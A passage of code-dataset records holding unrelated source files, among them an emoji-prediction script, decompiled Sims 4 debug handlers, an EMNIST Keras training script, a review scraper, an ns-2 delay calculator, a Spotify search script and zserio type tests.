Emoji ids (0-63)\n # correspond to the mapping in emoji_overview.png\n # at the root of the torchMoji repo.\n #print(f'prob:{prob}')\n print('Writing results to {}'.format(OUTPUT_PATH))\n scores = []\n print(f'prob: {prob}')\n for i, t in enumerate(test_sentences[0]):\n t_tokens = tokenized[i]\n t_score = [t]\n t_prob = prob[i]\n ind_top = top_elements(t_prob, 5)\n t_score.append(sum(t_prob[ind_top]))\n t_score.extend(ind_top)\n t_score.extend([t_prob[ind] for ind in ind_top])\n scores.append(t_score)\n #print(t_score)\n\n with open(OUTPUT_PATH, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=str(','), lineterminator='\\n')\n writer.writerow(['Text', 'Top5%',\n 'Emoji_1', 'Emoji_2', 'Emoji_3', 'Emoji_4', 'Emoji_5',\n 'Pct_1', 'Pct_2', 'Pct_3', 'Pct_4', 'Pct_5'])\n for i, row in enumerate(scores):\n try:\n writer.writerow(row)\n except:\n print(\"Exception at row {}!\".format(i))\n\n '''\n Single sentence mapping\n # Top emotion id\n emotion_ids = top_elements(prob, 5)\n print(f'top five emotion ids: {emotion_ids}')\n\n # map to emotions\n emotions = map(lambda x: EMOTIONS[x], emotion_ids)\n print(f'emojis: {list(emotions)}')\n #print(emotion.emojize(\"{} {}\".format(args.text,' '.join(emojis)), use_aliases=True))\n '''\n\n","sub_path":"nlp-emotions/examples/text_emotions.py","file_name":"text_emotions.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"588877207","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\gsi_handlers\\object_lost_and_found_service_handlers.py\n# Compiled at: 2018-10-26 00:20:22\n# Size of source mod 2**32: 4629 bytes\nfrom sims4.gsi.dispatcher import GsiHandler\nfrom sims4.gsi.schema import GsiGridSchema\nimport services\nolaf_service_objects_schema = GsiGridSchema(label='Object Lost & Found')\nolaf_service_objects_schema.add_field('object', label='Object')\nolaf_service_objects_schema.add_field('zone', label='Zone')\nolaf_service_objects_schema.add_field('street', label='Street')\nolaf_service_objects_schema.add_field('sim', label='Sim')\nolaf_service_objects_schema.add_field('household', label='Household')\nolaf_service_deleted_clone_schema = GsiGridSchema(label='Object Lost & Found/To Be Deleted')\nolaf_service_deleted_clone_schema.add_field('object', label='Object')\nolaf_service_deleted_clone_schema.add_field('zone', label='Zone')\nolaf_service_deleted_clone_schema.add_field('street', label='Street')\n\ndef _olaf_zone_str(zone_id, zone):\n if zone:\n return '{}:{}'.format(str(zone), zone.lot.get_lot_name())\n return str(zone_id)\n\n\ndef _olaf_obj_str(zone, object_id):\n obj_str = str(object_id)\n if zone is not None:\n if zone.is_instantiated:\n obj = zone.object_manager.get(object_id)\n if obj:\n obj_str = str(obj)\n return obj_str\n\n\n@GsiHandler('object_lost_and_found_service_objects', olaf_service_objects_schema)\ndef generate_object_lost_and_found_service_data(*args, zone_id: int=None, filter=None, **kwargs):\n lost_and_found = services.get_object_lost_and_found_service()\n zone_manager = services.get_zone_manager()\n sim_info_manager = services.sim_info_manager()\n household_manager = services.household_manager()\n if not (lost_and_found and zone_manager and sim_info_manager and household_manager):\n return []\n registered_objects = []\n for locator in 
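# In the text_emotions.py record above, the loop
#     for sentence in test_sentences[0]:
#         if len(sentence) == 0:
#             sentence = 'i'
# rebinds only the local name, so empty strings stay in the list; replacing
# them needs an explicit write-back, e.g.:
rows = ['hello', '', 'world']
rows = ['i' if len(s) == 0 else s for s in rows]
assert rows == ['hello', 'i', 'world']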
lost_and_found.registered_object_locators:\n if zone_id is not None:\n if zone_id != locator.zone_id:\n continue\n zone = zone_manager.get(locator.zone_id)\n sim_str = str(locator.sim_id)\n sim_info = sim_info_manager.get(locator.sim_id)\n if sim_info:\n sim_str = '{}:{}'.format(str(sim_info), locator.sim_id)\n household_str = str(locator.household_id)\n household = household_manager.get(locator.household_id)\n if household:\n household_str = '{}:{}'.format(household.name, locator.household_id)\n registered_objects.append({'object':_olaf_obj_str(zone, locator.object_id), \n 'zone':_olaf_zone_str(locator.zone_id, zone), \n 'street':locator.open_street_id, \n 'sim':sim_str, \n 'household':household_str})\n\n return registered_objects\n\n\n@GsiHandler('object_lost_and_found_service_clones', olaf_service_deleted_clone_schema)\ndef generate_olaf_service_deleted_clone_schema_data(*args, zone_id: int=None, filter=None, **kwargs):\n lost_and_found = services.get_object_lost_and_found_service()\n zone_manager = services.get_zone_manager()\n return lost_and_found and zone_manager or []\n clones_to_delete_by_zone = lost_and_found.clones_to_delete_by_zone\n clones_to_delete_by_street = lost_and_found.clones_to_delete_by_street\n clones_to_delete = []\n object_ids = set()\n for zone_id, objects in clones_to_delete_by_zone.items():\n if zone_id is not None:\n if zone_id != zone_id:\n continue\n zone = zone_manager.get(zone_id)\n for object_id in objects:\n street_str = 'n/a'\n for street_id, objects in clones_to_delete_by_street.items():\n if object_id in objects:\n street_str = str(street_id)\n break\n\n clones_to_delete.append({'object':_olaf_obj_str(zone, object_id), \n 'zone':_olaf_zone_str(zone_id, zone), \n 'street':street_str})\n object_ids.add(object_id)\n\n if zone_id is None:\n for street_id, objects in clones_to_delete_by_street.items():\n for object_id in objects:\n if object_id in object_ids:\n continue\n clones_to_delete.append({'object':_olaf_obj_str(services.current_zone(), object_id), \n 'zone':'n/a', \n 'street':street_id})\n\n return clones_to_delete","sub_path":"Scripts/simulation/gsi_handlers/object_lost_and_found_service_handlers.py","file_name":"object_lost_and_found_service_handlers.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"566440218","text":"import os\n\nfrom app.create_app import create_app\n\nDEBUG = os.getenv(\"DEBUG\", \"\").lower() in (\"true\", \"1\")\nHOST = os.getenv(\"HOST\", \"127.0.0.1\")\nPORT = int(os.getenv(\"PORT\", \"80\"))\napp = create_app()\n\nif __name__ == \"__main__\":\n app.run(host=HOST, debug=DEBUG, port=PORT)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179271319","text":"\r\nfrom __future__ import print_function\r\nimport tensorflow as tf\r\nimport keras\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense, Dropout, Flatten\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras import backend as K\r\nfrom keras.datasets import mnist\r\nfrom mnist import MNIST\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.models import load_model\r\nfrom keras.models import model_from_json\r\n\r\n\r\n\r\nimg_rows, img_cols = 28, 28\r\n\r\nemnist_data = MNIST(path='data1\\\\', return_type='numpy')\r\nemnist_data.select_emnist('letters')\r\nX, y = 
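# The second GSI handler above is uncompyle6 output, and its line
# `return lost_and_found and zone_manager or []` followed by unreachable code
# is almost certainly a mangled early-exit guard. A hedged reconstruction of
# the likely original shape (names reused from the record for illustration):
def _guard(lost_and_found, zone_manager):
    if not (lost_and_found and zone_manager):
        return []
    clones_to_delete = []
    # ... the rest of the handler would populate clones_to_delete ...
    return clones_to_delete

assert _guard(None, object()) == []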
emnist_data.load_training()\r\n\r\n\r\nX = X.reshape(124800, 28, 28)\r\ny = y.reshape(124800, 1)\r\n\r\ny = y-1\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=111)\r\n\r\nx_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\r\nx_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\r\ninput_shape = (img_rows, img_cols, 1)\r\n\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\n\r\n\r\nx_train /= 255\r\nx_test /= 255\r\nbatch_size = 128\r\nnum_classes = 26\r\nepochs = 10\r\n\r\n\r\ny_train = keras.utils.to_categorical(y_train, num_classes)\r\ny_test = keras.utils.to_categorical(y_test, num_classes)\r\n\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(32, kernel_size=(3, 3),\r\n activation='relu',\r\n input_shape=input_shape))\r\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(num_classes, activation='softmax'))\r\n\r\n\r\nmodel.compile(loss=keras.losses.categorical_crossentropy,\r\n optimizer=keras.optimizers.Adadelta(),\r\n metrics=['accuracy'])\r\n\r\n\r\n\r\n\r\nmodel.fit(x_train, y_train,\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n verbose=1,\r\n validation_data=(x_test, y_test))\r\n# Save the model weights for future reference\r\nmodel_json = model.to_json()\r\nwith open(\"training_model.json\", \"w\") as json_file:\r\n json_file.write(model_json)\r\nmodel.save('training_model.h5')\r\n\r\n\r\nscore = model.evaluate(x_test, y_test, verbose=0)\r\nprint('Test loss:', score[0])\r\nprint('Test accuracy:', score[1])","sub_path":"model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426792032","text":"import requests\nfrom bs4 import BeautifulSoup, NavigableString\n\n\ndef get_review_text(block):\n \"\"\"Get just the text of a review from it's DIV\"\"\"\n strings = []\n for possible_text in block.children:\n if isinstance(possible_text, NavigableString):\n stripped_text = possible_text.strip()\n if len(stripped_text) > 0:\n strings.append(stripped_text)\n return \"\\n\".join(strings)\n\n\ndef get_review_texts(review_html):\n \"\"\"Get all the reviews on a review page\"\"\"\n soup = BeautifulSoup(review_html)\n table = soup.find(id=\"productReviews\").tr.td\n review_blocks = table.find_all(\"div\", recursive=False)\n return [get_review_text(block) for block in review_blocks]\n\n\ndef get_review_page_count(review_html):\n \"\"\"Get the number of review pages\"\"\"\n soup = BeautifulSoup(review_html)\n try:\n return int(soup.find(\"span\", class_=\"paging\").find_all(\"a\")[-2].text)\n except:\n return 1\n\n\ndef get_all_reviews(review_url):\n \"\"\"Get all the reviews, given a review page URL\"\"\"\n # sanitize the url\n review_url = \"/\".join(review_url.split(\"/\")[:-1])\n\n first_review_page = requests.get(review_url).text\n review_page_count = get_review_page_count(first_review_page)\n reviews = []\n for i in range(1, review_page_count + 1):\n url = review_url + \"?pageNumber=%d\" % i\n review_html = requests.get(url).text\n reviews.extend(get_review_texts(review_html))\n return 
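# Why model_training.py above does y = y - 1: the EMNIST 'letters' split
# labels classes 1..26, while one-hot encoders such as to_categorical expect
# 0-based class indices. A numpy-only sketch of the same shift:
import numpy as np

y = np.array([1, 26])            # raw EMNIST letter labels (a=1 .. z=26)
one_hot = np.eye(26)[y - 1]      # shift to 0..25 before one-hot encoding
assert one_hot[0, 0] == 1.0 and one_hot[1, 25] == 1.0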
reviews","sub_path":"all-gists/5041434/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640660887","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Duygu Bulut - b181210374\r\n & \r\n Merve Bacak - b161210050\r\n\"\"\"\r\n#her sütun için gerekli bilgilerin tutulacağı listeler\r\nall_events = [] \r\nall_times = []\r\nall_from_nodes = []\r\nall_to_nodes = []\r\nall_pkt_type = []\r\nall_pkt_size = []\r\nall_flags = []\r\nall_fids = []\r\nall_src_addr = []\r\nall_dest_addr = []\r\nall_seq_nums =[]\r\nall_pktid = []\r\n\r\n'''tracefile'daki her bir sütunu elde etmek için dosyayı okurken\r\nboşluklara gore parse edildi.'''\r\nimport codecs\r\nwith codecs.open(\"iz.tr\", \"r\", \"UTF8\") as my_trace_file:\r\n my_trace_file=my_trace_file.readlines()\r\n \r\nfor line in my_trace_file:\r\n \r\n item = line.split(\" \");\r\n #elde edilen sütun bilgileri oluşturulan listelere atıldı.\r\n all_events.append(item[0])\r\n all_times.append(item[1])\r\n all_from_nodes.append(item[2]) \r\n all_to_nodes.append(item[3]) \r\n all_pkt_type.append(item[4]) \r\n all_pkt_size.append(item[5]) \r\n all_flags.append(item[6]) \r\n all_fids.append(item[7]) \r\n all_src_addr.append(item[8]) \r\n all_dest_addr.append(item[9]) \r\n all_seq_nums.append(item[10]) \r\n all_pktid.append(item[11]) \r\n \r\n'''dosya okunurken string olarak okunduğu için \r\nsayısal olan değerleri islem yapabilmek icin donusturmek gerekiyor.'''\r\nall_times_f = [] # times float tipine donusecek\r\n\r\n#zamanı floata cevirmek icin\r\nfor i in all_times:\r\n all_times_f.append(float(i))\r\n \r\n #veriyi dataframe'e donusturmek icin pandas import edildi \r\nimport pandas as pd\r\n\r\n#elde edilen listeler dataframe'e atıldı\r\ndata = {'event': all_events,\r\n 'times': all_times_f,\r\n 'from_nodes' : all_from_nodes,\r\n 'to_nodes' : all_to_nodes,\r\n 'pkt_type' : all_pkt_type,\r\n 'pkt_size' : all_pkt_size,\r\n 'flags' : all_flags,\r\n 'fids' : all_fids,\r\n 'src_addr' : all_src_addr,\r\n 'dest_addr' : all_dest_addr,\r\n 'seq_nums' : all_seq_nums,\r\n 'pkt_id' : all_pktid \r\n }\r\n\r\n#delay hesaplamak icin gerekli fonksiyon yazildi\r\ndef calculate_delay(sendTimes, receivedTimes): \r\n\r\n delay = 0.0\r\n delay = receivedTimes - sendTimes\r\n return delay\r\n\r\n# DataFrame olusturuluyor\r\ndf = pd.DataFrame(data)\r\n \r\n'''eventi r olan ve aynı islem zamanında gonderilmis olan veriyi\r\nbir yerde toplamak ve delay hesaplamak icin while dongusunde\r\ngerekli islemler yapildi, tum delay degerleri hesaplandi'''\r\ni=1\r\nreceived_pkt = 0\r\ntotal_times = 0.0 \r\ndelay_list = [] #delay degerlerini tutmak icin liste olusturuldu\r\ntimes_list = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19] \r\ntemp_delay = 0.0\r\n\r\nwhile(i!= 20):\r\n select_times = df.loc[(df['event'] == 'r') & ((df['times']) >= i ) & ((df['times']) < i+1 )]\r\n select_received = (select_times.loc[(df['pkt_type'] == 'tcp')])\r\n select_send = (select_times.loc[(df['pkt_type'] == 'ack')])\r\n times_received = select_received['times'].sum()\r\n times_send = select_send['times'].sum()\r\n #print(times_send)\r\n temp_delay = calculate_delay(times_send, times_received)\r\n #print(temp_delay)\r\n\r\n delay_list.append(temp_delay) \r\n i = i+1\r\n \r\n# x ekseni zaman y ekseni end to end delay olacak şekilde grafik çizdirildi\r\nimport matplotlib.pyplot as plt\r\nplt.plot(times_list, delay_list)\r\nplt.ylabel('delay as seconds')\r\nplt.xlabel('times 
as seconds')\r\nplt.title('Change of delay over time')\r\nplt.show()\r\n\r\n \r\n\r\n\r\n\r\n","sub_path":"endToEndDelay.py","file_name":"endToEndDelay.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"453869465","text":"# 2nd program - Turtle [2020.09.28]\nimport turtle\nt = turtle.Turtle()\n\nNBR_DE_MARCHE = 5\nNBR_DE_PIXELS = 10\n\n# fonction escalier(taille en pixel, nbr. de marches)\ndef escalier(taille_pxl, nbr_marhces) :\n for i in range (0, NBR_DE_MARCHE):\n t.forward(taille_pxl)\n t.left(90)\n t.forward(taille_pxl)\n t.right(90)\n taille_pxl += taille_pxl / 2\n # taille_pxl -= taille_pxl / 2\n t.forward(taille_pxl)\n\n# fonction carre(taille d'un cote en pixel)\ndef carre(taille_pxl_cote) :\n for i in range (0, 4):\n t.forward(taille_pxl_cote)\n t.left(90)\n\n# fonction carres(nbr. de carrés)\ndef carres(nbr_carres, taille_depart):\n for c in range(0, nbr_carres) :\n carre(taille_depart * (c+1))\n\nescalier(NBR_DE_PIXELS, NBR_DE_MARCHE)\nt.clear()\nt.backward(100)\ncarres(5, 10)\n\nturtle.done()\n\n","sub_path":"Python (debutant)/2_programme_tortue/programme_tortue/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298783931","text":"import requests\nimport argparse\nfrom secret import spotify_token\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Script to find stats of users individually or as a group\",allow_abbrev=False)\n parser.add_argument('-top',\"--top_track\", action='store', type=str,help=\"Enter the artist name\")\n #parser.add_argument('-t',\"--text\", action='store', type=str,help=\"Use the text file\")\n args = parser.parse_args()\n if args.top_track:\n #spotify:artist:5Pwc4xIPtQLFEnJriah9YJ\n song_name=\"hot girl bummer\"\n artist=args.top_track\n \"\"\"Search For the Song\"\"\"\n query = \"https://api.spotify.com/v1/search?q={}&type=artist\".format(\n artist\n )\n\n response = requests.get(\n query,\n headers={\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer {}\".format(spotify_token)\n }\n )\n response_json = response.json()\n data = response_json[\"artists\"][\"items\"][0]\n\n print(data)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"267537056","text":"# This file is part of comma, a generic and flexible library\n# Copyright (c) 2011 The University of Sydney\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of the University of Sydney nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE\n# GRANTED BY THIS LICENSE. 
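# The Turkish comments in endToEndDelay.py above explain that the ns-2 trace
# (iz.tr) is split on spaces to recover each column and that send/receive
# timestamps are summed per one-second window. Subtracting those *sums* only
# gives a coarse aggregate; per-packet end-to-end delay pairs each packet's
# send event with its receive event instead. A minimal sketch over
# (event, time, pkt_id) tuples ('+' stands in for the send event; dyadic
# times keep the float comparison exact):
events = [('+', 1.0, 'p1'), ('r', 1.5, 'p1'), ('+', 2.0, 'p2'), ('r', 2.25, 'p2')]
sent = {pid: t for ev, t, pid in events if ev == '+'}
delays = [t - sent[pid] for ev, t, pid in events if ev == 'r' and pid in sent]
assert delays == [0.5, 0.25]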
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT\n# HOLDERS AND CONTRIBUTORS \\\"AS IS\\\" AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN\n# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport numpy as np\nfrom ..numpy import types_of_dtype, structured_dtype, type_to_string\n\n\nclass struct(object):\n \"\"\"\n see github.com/acfr/comma/wiki/python-csv-module for details\n \"\"\"\n default_field_name = 'comma_struct_default_field_name_'\n\n def __init__(self, concise_fields, *concise_types):\n self.concise_types = concise_types\n self.concise_fields = self._fill_blanks(concise_fields)\n self._check_fields_conciseness()\n #self.dtype = np.dtype(zip(self.concise_fields, self.concise_types))\n self.dtype = np.dtype([(x,y) for x,y in zip(self.concise_fields, self.concise_types)])\n self.fields = self._full_xpath_fields()\n self.nondefault_fields = self._nondefault_fields()\n self.types = self._basic_types()\n self.shorthand = self._shorthand()\n self.format = ','.join(self.types)\n #self.flat_dtype = np.dtype(zip(self.fields, self.types))\n self.flat_dtype = np.dtype([(x,y) for x,y in zip(self.fields, self.types)])\n unrolled_types = types_of_dtype(self.flat_dtype, unroll=True)\n self.unrolled_flat_dtype = structured_dtype(','.join(unrolled_types))\n self.type_of_field = dict(zip(self.fields, self.types))\n leaves = tuple(xpath.split('/')[-1] for xpath in self.fields)\n self.ambiguous_leaves = set(leaf for leaf in leaves if leaves.count(leaf) > 1)\n self.xpath_of_leaf = self._xpath_of_leaf(leaves)\n\n def __call__(self, size=1):\n return np.empty(size, dtype=self)\n\n def to_tuple(self, s):\n \"\"\"\n convert a scalar or 1d array of dtype defined by struct to tuple\n\n >>> import comma\n >>> struct = comma.csv.struct('a,b', 'S2', 'u4')\n >>> data = struct()\n >>> data['a'] = 'ab'\n >>> data['b'] = 12\n >>> struct.to_tuple(data)\n ('ab', 12L)\n \"\"\"\n if s.dtype != self.dtype:\n msg = \"expected {}, got {}\".format(repr(self.dtype), repr(s.dtype))\n raise TypeError(msg)\n if not (s.shape == (1,) or s.shape == ()):\n msg = \"expected a scalar or 1d array with size=1, got shape={}\".format(s.shape)\n raise ValueError(msg)\n return s.view(self.unrolled_flat_dtype).item()\n\n def expand_shorthand(self, compressed_fields):\n \"\"\"\n return tuple of full-xpath fields corresponding to the given shorthand\n\n >>> import comma\n >>> inner = comma.csv.struct('i,j', 'u1', 'u1')\n >>> outer = comma.csv.struct('in', inner)\n >>> outer.expand_shorthand('in')\n ('in/i', 'in/j')\n \"\"\"\n if isinstance(compressed_fields, str):\n compressed_fields = compressed_fields.split(',')\n expand = self.shorthand.get\n field_tuples = map(lambda name: expand(name) or (name,), compressed_fields)\n return sum(field_tuples, ())\n\n def _nondefault_fields(self):\n default_name = struct.default_field_name\n return tuple(map(lambda f: '' if f.startswith(default_name) else f, self.fields))\n\n def _fill_blanks(self, 
fields):\n if isinstance(fields, str):\n fields = fields.split(',')\n ntypes = len(self.concise_types)\n if len(fields) > ntypes:\n fields_without_type = ','.join(fields[ntypes:])\n msg = \"missing types for fields '{}'\".format(fields_without_type)\n raise ValueError(msg)\n omitted_fields = [''] * (ntypes - len(fields))\n fields_without_blanks = []\n for index, field in enumerate(fields + omitted_fields):\n if field:\n nonblank_field = field\n else:\n nonblank_field = '{}{}'.format(struct.default_field_name, index)\n fields_without_blanks.append(nonblank_field)\n return fields_without_blanks\n\n def _check_fields_conciseness(self):\n for field in self.concise_fields:\n if '/' in field:\n msg = \"expected fields without '/', got '{}'\".format(field)\n raise ValueError(msg)\n\n def _full_xpath_fields(self):\n fields = []\n for name, type in zip(self.concise_fields, self.concise_types):\n if isinstance(type, struct):\n fields_of_type = [name + '/' + field for field in type.fields]\n fields.extend(fields_of_type)\n else:\n fields.append(name)\n return tuple(fields)\n\n def _basic_types(self):\n types = []\n for type in self.concise_types:\n if isinstance(type, struct):\n types.extend(type.types)\n else:\n types.append(type_to_string(type))\n return tuple(types)\n\n def _shorthand(self):\n shorthand = {}\n for name, type in zip(self.concise_fields, self.concise_types):\n if not isinstance(type, struct):\n continue\n fields_of_type = [name + '/' + field for field in type.fields]\n shorthand[name] = tuple(fields_of_type)\n for subname, subfields in type.shorthand.iteritems():\n xpath = name + '/' + subname\n shorthand[xpath] = tuple(name + '/' + field for field in subfields)\n return shorthand\n\n def _xpath_of_leaf(self, leaves):\n xpath_of_leaf = dict(zip(leaves, self.fields))\n for ambiguous_leaf in self.ambiguous_leaves:\n del xpath_of_leaf[ambiguous_leaf]\n return xpath_of_leaf\n","sub_path":"python/comma/csv/struct.py","file_name":"struct.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"548522122","text":"import sys\nimport unittest\n\nimport zserio\n\nfrom testutils import getZserioApi\n\nclass AllBuiltInTypesTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.api = getZserioApi(__file__, \"builtin_types.zs\").all_builtin_types\n\n def testUint8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setUint8Type(zserio.limits.UINT8_MAX)\n self.assertEqual(zserio.limits.UINT8_MAX, allBuiltInTypes.getUint8Type())\n\n def testUint16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setUint16Type(zserio.limits.UINT16_MAX)\n self.assertEqual(zserio.limits.UINT16_MAX, allBuiltInTypes.getUint16Type())\n\n def testUint32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setUint32Type(zserio.limits.UINT32_MAX)\n self.assertEqual(zserio.limits.UINT32_MAX, allBuiltInTypes.getUint32Type())\n\n def testUint64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setUint64Type(zserio.limits.UINT64_MAX)\n self.assertEqual(zserio.limits.UINT64_MAX, allBuiltInTypes.getUint64Type())\n\n def testInt8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setInt8Type(zserio.limits.INT8_MAX)\n self.assertEqual(zserio.limits.INT8_MAX, allBuiltInTypes.getInt8Type())\n\n def testInt16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n 
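# struct.py above is mid-port from Python 2 (note the commented-out
# np.dtype(zip(...)) lines): _shorthand still calls dict.iteritems(), which
# Python 3 removed. The drop-in replacement is .items():
shorthand = {'in': ('in/i', 'in/j')}
for subname, subfields in shorthand.items():   # .iteritems() exists only on Python 2
    assert subname == 'in' and subfields == ('in/i', 'in/j')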
allBuiltInTypes.setInt16Type(zserio.limits.INT16_MAX)\n self.assertEqual(zserio.limits.INT16_MAX, allBuiltInTypes.getInt16Type())\n\n def testInt32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setInt32Type(zserio.limits.INT32_MAX)\n self.assertEqual(zserio.limits.INT32_MAX, allBuiltInTypes.getInt32Type())\n\n def testInt64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setInt64Type(zserio.limits.INT64_MAX)\n self.assertEqual(zserio.limits.INT64_MAX, allBuiltInTypes.getInt64Type())\n\n def testBitField7Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield7Type = 0x7F\n allBuiltInTypes.setBitfield7Type(maxBitfield7Type)\n self.assertEqual(maxBitfield7Type, allBuiltInTypes.getBitfield7Type())\n\n def testBitField8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield8Type = zserio.limits.UINT8_MAX\n allBuiltInTypes.setBitfield8Type(maxBitfield8Type)\n self.assertEqual(maxBitfield8Type, allBuiltInTypes.getBitfield8Type())\n\n def testBitField15Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield15Type = 0x7FFF\n allBuiltInTypes.setBitfield15Type(maxBitfield15Type)\n self.assertEqual(maxBitfield15Type, allBuiltInTypes.getBitfield15Type())\n\n def testBitField16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield16Type = zserio.limits.UINT16_MAX\n allBuiltInTypes.setBitfield16Type(maxBitfield16Type)\n self.assertEqual(maxBitfield16Type, allBuiltInTypes.getBitfield16Type())\n\n def testBitField31Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield31Type = 0x7FFFFFFF\n allBuiltInTypes.setBitfield31Type(maxBitfield31Type)\n self.assertEqual(maxBitfield31Type, allBuiltInTypes.getBitfield31Type())\n\n def testBitField32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield32Type = zserio.limits.UINT32_MAX\n allBuiltInTypes.setBitfield32Type(maxBitfield32Type)\n self.assertEqual(maxBitfield32Type, allBuiltInTypes.getBitfield32Type())\n\n def testBitField63Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield63Type = 0x7FFFFFFFFFFFFFFF\n allBuiltInTypes.setBitfield63Type(maxBitfield63Type)\n self.assertEqual(maxBitfield63Type, allBuiltInTypes.getBitfield63Type())\n\n def testVariableBitfieldType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxVariableBitfieldType = zserio.limits.UINT64_MAX\n allBuiltInTypes.setVariableBitfieldType(maxVariableBitfieldType)\n self.assertEqual(maxVariableBitfieldType, allBuiltInTypes.getVariableBitfieldType())\n\n def testVariableBitField8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxVariableBitfield8Type = zserio.limits.UINT8_MAX\n allBuiltInTypes.setVariableBitfield8Type(maxVariableBitfield8Type)\n self.assertEqual(maxVariableBitfield8Type, allBuiltInTypes.getVariableBitfield8Type())\n\n def testIntField8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setIntfield8Type(zserio.limits.INT8_MAX)\n self.assertEqual(zserio.limits.INT8_MAX, allBuiltInTypes.getIntfield8Type())\n\n def testIntField16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n 